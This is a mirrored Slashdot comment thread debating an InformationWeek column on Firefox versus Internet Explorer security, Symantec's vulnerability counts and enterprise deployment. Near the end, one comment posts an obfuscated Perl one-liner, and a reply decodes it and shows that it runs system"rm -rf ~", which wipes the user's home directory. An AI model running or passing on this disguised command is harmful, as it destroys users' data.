Slashdot Mirror
Pros and Cons of Firefox Critically Evaluated?
A Dafa Disciple writes "Fred Langa of Information Week has written an article claiming to discuss the 'Pros and Cons of Firefox'. At first I was excited because I thought I was going to get to finally read an enlightening, in-depth article that critically examined the browser. I should have known better. Aside from the usual criticism of open source software, it contains a reference to a Symantec Internet Security Report which claims that more security vulnerabilities in the last six months of 2004 were found in Firefox than IE. I'll leave it to you to analyze Mr. Langa's opinion and scrutinize Symantec's study and reputation as a security software developer."
i have begun to doubt symantec's expertise. i work in a college where virus outbreaks are pretty common. now i've seen a computer with the most up to date, newest version of norton/symantec anti-virus and it seems that it still does not find all the viruses. viruses and trojans that are relatively harmful to the system. i would take this story with a grain of salt...
please me, have no regrets.
At first I was excited because I thought I was going to get to finally read an enlightening, in-depth article that critically examined the browser.
And I thought my life was dull. You need help my friend. Now!
this extension should be useful :
http://mozilla.doslash.org/infolister/
InfoLister is an extension for Mozilla Firefox, Mozilla Thunderbird and Nvu that collects various information about Firefox/Thunderbird and saves it to a file. Currently it prints the list of installed extensions, themes and plugins.
-Have to- install? I downloaded one additional theme for Firefox and apart from the occasional plugin such as Shockwave, I never have to do anything to enhance Firefox for daily use.
It's nice that you have everything worked out -- but this is like saying that Internet Explorer is as much of a hassle because of all those security updates you have to download. No thanks.
Green's Law of Debate: Anything is possible if you don't know what you're talking about.
Print version of the article fitting nicely onto one page.
Its a little odd that this article would be posted without a note that Firefox 1.0.3 has just been released: http://www.mozilla.org/products/firefox/releases/1 .0.3.html
http://www.frontmotion.com/Firefox/
Have you tried this by chance?
I haven't personally, but I keep hearing good things about it.
Karma: Chameleon (mostly due to the fact that you come and go).
Disregarding the validity of the position, apparently the OP felt that the cons were based largely on positions already proven false. As a result, enlightenment in this case would have been based on cons based on results considered less inflammatory.
Assuming the OP truly was not looking for a 'yes man' style of article, it is reasonable to believe a review detailing true failings of Firefox without resorting to questionable statistics would have met the requirements for 'enlightenment'.
I used to run adaware with IE, I've run it once and a while since I switched to firefox and it'll occasionally find a cookie or two that doesn't bother me. With IE it'd find a couple hundred problems.
Security vulnerabilites my ass.
(yes I know spyware and security is different, but firefox sure is a lot less of a pain in the ass)
"You can't handle the truth! Son, we live in a world that has (fire) walls. And those walls have to be guarded by men with (antivirus software.) Who's gonna do it? You? ... I have a greater responsibility than you can possibly fathom. You weep for (FireFox) and you curse (Microsoft.) You have that luxury. You have the luxury of not knowing what I know: that (IE6.0 vulnerabilities,) while tragic, probably saved lives. And my existence, while grotesque and incomprehensible to you, saves lives...You don't want the truth. Because deep down, in places you don't talk about at parties, you want me on that wall. You need me on that (fire) wall."
ELOI, ELOI, LAMA SABACHTHANI!?
Why is this a "downside"?
Would you prefer a 50Mb download, with 45Mb of stuff you don't ever need or use, or a 4Mb download where you can optionally add bits you want
Not everybody wants "chrome" (or themes), Flash, etc etc.
Personally I love the lean approach, with the ability to add and tweak stuff that I want over the bloated, switch off all the crap you don't want approach...
Perhaps some kind of "shopping basket" download system on the Mozilla update site would be a good way to go. Personally, I quite like the "Download Basket" that Microsoft uses on its Windows Update site when you do a manual update. Something like a standard shopping cart to choose the plugins that you are interested in, followed by a Windows Update style confirmation and install process would be ideal. If you could also save the baskets and reuse them on multiple PCs that would make widescale deployment of Firefox sooo much easier...
UNIX? They're not even circumcised! Savages!
Cons: It isn't explorer**
*potentially more secure
**some pages don't render right since some people only test with explorer
I Am My Own Worst Enemy
Just because it's critical doesn't mean it's enlightening. I could give my five year old daughter a stack of printouts detailing vulnerabilites found by group XYZ, and in a second she can tell you which stack was bigger and might even count them out if she felt inclined to. That's not enlightening... What matters is quality, not quantity.
Also, anybody can get access to the source of Firefox, while IE doesn't have publicly viewable source code. Comparing vulnerabilities among the two browsers is an apples and oranges afair thanks to this.
I assume you haven't RTFA, but here's more or less the criticism that Firefox gets:
1) "Oh look! It has more vulnerabilities than IE!" (tho they fail to state how critical these are. And don't forget that Firefox 1.03 was just released, fixing these. How long it took IE to release theirs?)
and 2) "BWA! Firefox fails to render my favorite IE-only pages!" complains from users.
And that was on the last 1 1/2 pages. The others were just straw words (your usual columnist intro).
This columnist isn't enlightening, nor critical. He's just giving another misinformed opinion.
We see a large number of nitpick vulerabilities for open source because everyone can look at the source code and try to break it every which way. OTOH, finding exploits in IE is done by testers and hackers.
Regarding dupes, visiting Secunia shows many vulnerabilies for linux distros, but you see the same ones over and over again for each distrobution.
So while I agree that no software is perfect, and Firefox does have problems that arise from time to time, as does any software, I'll still be using the fox for my net browsing.
As for those testimonies in the article from people who can't get Firefox or Thunderbird working properly, wow. I've switched people's grandparents with no computer literacy with no problem. All I can say is that their system must be jacked up.
I'd prefer the 50 megger with all the plugins that my users would likely need as well as all the necessary performance tweaks, proxy settings, policy settings and anything else I can't think of right this minute.
Oh, I'd also like it in the for of an MSI so that I can roll it out to 1,000 systems at a time via script or GPO.
You see there are users out there besides home users and their requirements are a little different than your own.
A lot of other security/AV companies get definitions out MUCH faster than Symantec. I remember occasionally using Sophos's and other AV sites to solve virus issues becuase we didn't have the info.
Don't take life so seriously. No one makes it out alive.
Create the site specific Firefox + Extensions environment and roll a MSI package yourself. 2000 Server and possibly Professional come with the tools to do this, chances are they are in 2003 as well. Do you really expect Mozilla to create a site specific MSI for you?
"I use a Mac because I'm just better than you are."
I read the comment about Firefox not displaying the Yahoo logo and I couldn't believe it. Then, I popped over to Yahoo.com and sure enough, no logo.
A quick check of the source told me what was going on. I recognized the yimg URL as one that I had *BLOCKED* images from long ago. Yahoo serves tons of graphics ads all over the Internet and I just blocked them all using Firefox's native ability to block images from a particular URL.
It seems Yahoo serves their own graphics from the same server as their ads. Silly rabbit.
So, it isn't a rendering bug with Firefox, it is a feature! And a damned useful one at that.
feature + ignorance = bug? Sad.
-Charles
Learning HOW to think is more important than learning WHAT to think.
"Or should the Fx developers be forced to protect you from your own carelessness?"
Yes. I should not have to know a damn thing about computers in order to protect my information.
Granny buys something online and sees that auto complete can save her time next time. She won't stop to think about how it works if she even stops to read anything at all before clicking "yes" to the "would you like to use auto complete" dialog.
All auto complete information should be encrypted. No excuses.
http://brandonbloom.name
Firefox's "install" consists of one directory. Copied to many machines. The configuration consists of one file stored in a user's profile. The distribution of both is easily automated without requiring the use of an MSI.
Plugins, BTW, are also in that folder in the user's profile. You know, the one that's stored on a central server in your large network? Just set up firefox once on a test machine, and copy the firefox profile folder to each user's windows profile, then distribute the program files however you prefer to do that kind of thing.
This can't be the first program with a non-MSI install method that an admin of a large network has encountered...
$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see
; ;
Adding whitespace
($?) ? s:;s:s;;$?:
: s;;=]=>%-{<-|}<&|`{;
y; -/:-@[-`{-};`-{~" -;
s;;$_;see
$? is equal to zero normally, so that's the same as
s//=]=>%-{<-|}<&|`{/;
y/ -\/:-@[-`{-}/`-{~" -/;
s//$_/see
The first statement => $_ = '=]=>%-{<-|}<&|`{';
second translates $_ to 'system"rm -rf ~"'
third: eval $_
But, by writing off all of Internet Explorer's problems to the "installed base" scale factor is extremely dangerous to his readers.
The problem being, since MSIE is embedded into the OS, a flaw in MSIE can be exploited from any program which uses an HTML viewer, not only the "iexplore.exe" application itself. Firefox, even when it's your default browser, still pops up in full "visiting the Web" paranoia.
Another problem, of course, relates to MSIE's very strange handling of text/plain and application/octet-stream data types. (It will actually reject the Content-type: header from the server and make up a new one based on filename suffix and/or file content... imagine sending a text/plain file from a CGI URL that has ".doc" in it and it turning into a Word file. Note that the ".doc" is in the URL, not in the downloaded file name....) I've got a CGI I just can't make with MSIE properly because it rejects my server's claim that file "foo.log" with "inline" presentation is type "text/plain" and it can display it--it insists on saving to disk... only to find out that Notepad is the right application. To work around it, I'd have to change the extra path information fed to the CGI... and I can't do that--it means something, of course.
But that problem ("feature", if you read the MS knowledgebase) is one way how people are tricked into downloading seemingly "safe" content that turns dangerous.
Plus, he makes no assessment of the security problems. He doesn't mention ANY, from ANY browser, not even as illustration--he just leaves it to the reader to plow through pages of cryptic reports from Synamtec and CERT.
And he's got no analysis of the "trouble reports" he provides for Firefox. Missing images? 99 times out of 100, that's because the Web page has backslashes in the IMG URLs--which are not part of the hierarchical URI syntax. (They work only in MSIE on Windows. MSIE for Macintosh will not process them the same way.)
Plus... how do we really know what security problems are fixed in MSIE? On my XP box at home, and the W2K boxes I have to use at work, the Windows Updates just say things like, "A security problem could allow an attacker access to your computer." How am I to know what that security problem is, what part of the system it affects? I don't even know if it is function I use, or even have enabled--the update information is just too terse--at that's after clicking, "Show Details".
(My main systems are Linux and Mac, so there may be a way to get more information from Windows Update, but it isn't as obvious... unlike Mac OS X Software Update, where it lists the major components right there, and links that take you to the Apple web site for more information.)
My five year old daughter could prioritize them by severity and likelihood of exploit, add in a few of her own, and generate a patch that fixes them on the three most common platforms. What lame school are you sending your kids to?
Dewey, what part of this looks like authorities should be involved?
You also have to create a shortcut
Well that just blows your TCO. Better go back to IE.
Some of what I say is fact, some is conjecture, the rest I'm just blowing out my ass...you guess.
Because then you'll constantly get the "An additional plugin is required to view all the content on this page" popup/window/alert everytime you go to a site that uses flash.
So if you can live with that, dont install flashblock.
Parent: